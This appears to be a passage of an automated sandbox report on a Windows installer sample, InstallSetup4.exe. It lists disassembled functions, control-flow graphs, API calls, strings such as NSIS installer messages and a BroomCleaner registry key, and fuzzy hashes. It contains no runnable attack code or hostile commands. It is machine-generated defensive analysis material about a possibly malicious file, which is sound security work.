                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                            • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 606308-861673476
                                                                                            • Opcode ID: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
                                                                                            • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                            • Opcode Fuzzy Hash: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
                                                                                            • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                            Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 222 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 225 4030d2-4030d7 222->225 226 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 222->226 227 4032b2-4032b6 225->227 234 403110 226->234 235 4031f5-403203 call 40301e 226->235 237 403115-40312c 234->237 241 403205-403208 235->241 242 403258-40325d 235->242 239 403130-403139 call 4034d4 237->239 240 40312e 237->240 248 40325f-403267 call 40301e 239->248 249 40313f-403146 239->249 240->239 244 40320a-403222 call 4034ea call 4034d4 241->244 245 40322c-403256 GlobalAlloc call 4034ea call 4032b9 241->245 242->227 244->242 268 403224-40322a 244->268 245->242 273 403269-40327a 245->273 248->242 253 4031c2-4031c6 249->253 254 403148-40315c call 406002 249->254 258 4031d0-4031d6 253->258 259 4031c8-4031cf call 40301e 253->259 254->258 271 40315e-403165 254->271 264 4031e5-4031ed 258->264 265 4031d8-4031e2 call 406a38 258->265 259->258 264->237 272 4031f3 264->272 265->264 268->242 268->245 271->258 277 403167-40316e 271->277 272->235 274 403282-403287 273->274 275 40327c 273->275 278 403288-40328e 274->278 275->274 277->258 279 403170-403177 277->279 278->278 280 403290-4032ab SetFilePointer call 406002 278->280 279->258 281 403179-403180 279->281 285 4032b0 280->285 281->258 282 403182-4031a2 281->282 282->242 284 4031a8-4031ac 282->284 286 4031b4-4031bc 284->286 287 4031ae-4031b2 284->287 285->227 286->258 288 4031be-4031c0 286->288 287->272 287->286 288->258
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00403093
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,00000400), ref: 004030AF
                                                                                              • Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                              • Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 004030FB
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup4.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-3807918781
                                                                                            • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                            • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                            • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                            • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                            Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 353 4032b9-4032d0 354 4032d2 353->354 355 4032d9-4032e2 353->355 354->355 356 4032e4 355->356 357 4032eb-4032f0 355->357 356->357 358 403300-40330d call 4034d4 357->358 359 4032f2-4032fb call 4034ea 357->359 363 4034c2 358->363 364 403313-403317 358->364 359->358 365 4034c4-4034c5 363->365 366 40346d-40346f 364->366 367 40331d-403366 GetTickCount 364->367 370 4034cd-4034d1 365->370 368 403471-403474 366->368 369 4034af-4034b2 366->369 371 4034ca 367->371 372 40336c-403374 367->372 368->371 373 403476 368->373 376 4034b4 369->376 377 4034b7-4034c0 call 4034d4 369->377 371->370 374 403376 372->374 375 403379-403387 call 4034d4 372->375 378 403479-40347f 373->378 374->375 375->363 387 40338d-403396 375->387 376->377 377->363 385 4034c7 377->385 382 403481 378->382 383 403483-403491 call 4034d4 378->383 382->383 383->363 390 403493-40349f call 4060f9 383->390 385->371 389 40339c-4033bc call 406aa6 387->389 395 4033c2-4033d5 GetTickCount 389->395 396 403465-403467 389->396 397 4034a1-4034ab 390->397 398 403469-40346b 390->398 399 403420-403422 395->399 400 4033d7-4033df 395->400 396->365 397->378 403 4034ad 397->403 398->365 401 403424-403428 399->401 402 403459-40345d 399->402 404 4033e1-4033e5 400->404 405 4033e7-40341d MulDiv wsprintfW call 4055dc 400->405 407 40342a-403431 call 4060f9 401->407 408 40343f-40344a 401->408 402->372 409 403463 402->409 403->371 404->399 404->405 405->399 413 403436-403438 407->413 412 40344d-403451 408->412 409->371 412->389 414 403457 412->414 413->398 415 40343a-40343d 413->415 414->371 415->412
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: *B$ A$ A$... %d%%
                                                                                            • API String ID: 551687249-3485722521
                                                                                            • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                            • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                            • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                            • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                            Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 416 401774-401799 call 402dab call 405e9d 421 4017a3-4017b5 call 406557 call 405e26 lstrcatW 416->421 422 40179b-4017a1 call 406557 416->422 427 4017ba-4017bb call 406805 421->427 422->427 431 4017c0-4017c4 427->431 432 4017c6-4017d0 call 4068b4 431->432 433 4017f7-4017fa 431->433 441 4017e2-4017f4 432->441 442 4017d2-4017e0 CompareFileTime 432->442 435 401802-40181e call 406047 433->435 436 4017fc-4017fd call 406022 433->436 443 401820-401823 435->443 444 401892-4018bb call 4055dc call 4032b9 435->444 436->435 441->433 442->441 445 401874-40187e call 4055dc 443->445 446 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 443->446 458 4018c3-4018cf SetFileTime 444->458 459 4018bd-4018c1 444->459 456 401887-40188d 445->456 446->431 478 401869-40186a 446->478 460 402c38 456->460 462 4018d5-4018e0 FindCloseChangeNotification 458->462 459->458 459->462 466 402c3a-402c3e 460->466 463 4018e6-4018e9 462->463 464 402c2f-402c32 462->464 467 4018eb-4018fc call 406594 lstrcatW 463->467 468 4018fe-401901 call 406594 463->468 464->460 474 401906-4023a7 call 405bb7 467->474 468->474 474->464 474->466 478->456 480 40186c-40186d 478->480 480->445
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Installed,Installed,00000000,00000000,Installed,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$Installed$SOFTWARE\BroomCleaner
                                                                                            • API String ID: 1941528284-2703293957
                                                                                            • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                            • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                            • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                            • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                            Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 482 4068db-4068fb GetSystemDirectoryW 483 4068fd 482->483 484 4068ff-406901 482->484 483->484 485 406912-406914 484->485 486 406903-40690c 484->486 488 406915-406948 wsprintfW LoadLibraryExW 485->488 486->485 487 40690e-406910 486->487 487->488
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                            • wsprintfW.USER32 ref: 0040692D
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                            • API String ID: 2200240437-1106614640
                                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                            Function 004020DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 489 4020dd-4020e9 490 4021a8-4021aa 489->490 491 4020ef-402105 call 402dab * 2 489->491 492 4022f6-4022fb call 401423 490->492 501 402115-402124 LoadLibraryExW 491->501 502 402107-402113 GetModuleHandleW 491->502 498 402c2f-402c3e 492->498 504 402126-402135 call 4069ba 501->504 505 4021a1-4021a3 501->505 502->501 502->504 508 402170-402175 call 4055dc 504->508 509 402137-40213d 504->509 505->492 514 40217a-40217d 508->514 510 402156-40216e 509->510 511 40213f-40214b call 401423 509->511 510->514 511->514 522 40214d-402154 511->522 514->498 517 402183-40218d call 403bc9 514->517 517->498 521 402193-40219c FreeLibrary 517->521 521->498 522->514
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402108
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                            • String ID: Xj
                                                                                            • API String ID: 334405425-403292392
                                                                                            • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                            • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                            • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                            • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                            Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 523 405f2e-405f49 call 406557 call 405ed1 528 405f4b-405f4d 523->528 529 405f4f-405f5c call 406805 523->529 530 405fa7-405fa9 528->530 533 405f6c-405f70 529->533 534 405f5e-405f64 529->534 536 405f86-405f8f lstrlenW 533->536 534->528 535 405f66-405f6a 534->535 535->528 535->533 537 405f91-405fa5 call 405e26 GetFileAttributesW 536->537 538 405f72-405f79 call 4068b4 536->538 537->530 543 405f80-405f81 call 405e72 538->543 544 405f7b-405f7e 538->544 543->536 544->528 544->543
                                                                                            APIs
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                                                            • GetFileAttributesW.KERNEL32(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 3248276644-263117582
                                                                                            • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                            • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                            • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                            • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                            Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 546 406076-406082 547 406083-4060b7 GetTickCount GetTempFileNameW 546->547 548 4060c6-4060c8 547->548 549 4060b9-4060bb 547->549 550 4060c0-4060c3 548->550 549->547 551 4060bd 549->551 551->550
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00406094
                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-2113348990
                                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                            Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 552 4015c6-4015da call 402dab call 405ed1 557 401636-401639 552->557 558 4015dc-4015ef call 405e53 552->558 560 401668-4022fb call 401423 557->560 561 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 557->561 566 4015f1-4015f4 558->566 567 401609-40160c call 405b05 558->567 573 402c2f-402c3e 560->573 561->573 577 401660-401663 561->577 566->567 571 4015f6-4015fd call 405b22 566->571 574 401611-401613 567->574 571->567 582 4015ff-401602 call 405aab 571->582 578 401615-40161a 574->578 579 40162c-401634 574->579 577->573 583 401629 578->583 584 40161c-401627 GetFileAttributesW 578->584 579->557 579->558 587 401607 582->587 583->579 584->579 584->583 587->574
                                                                                            APIs
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                              • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                              • Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
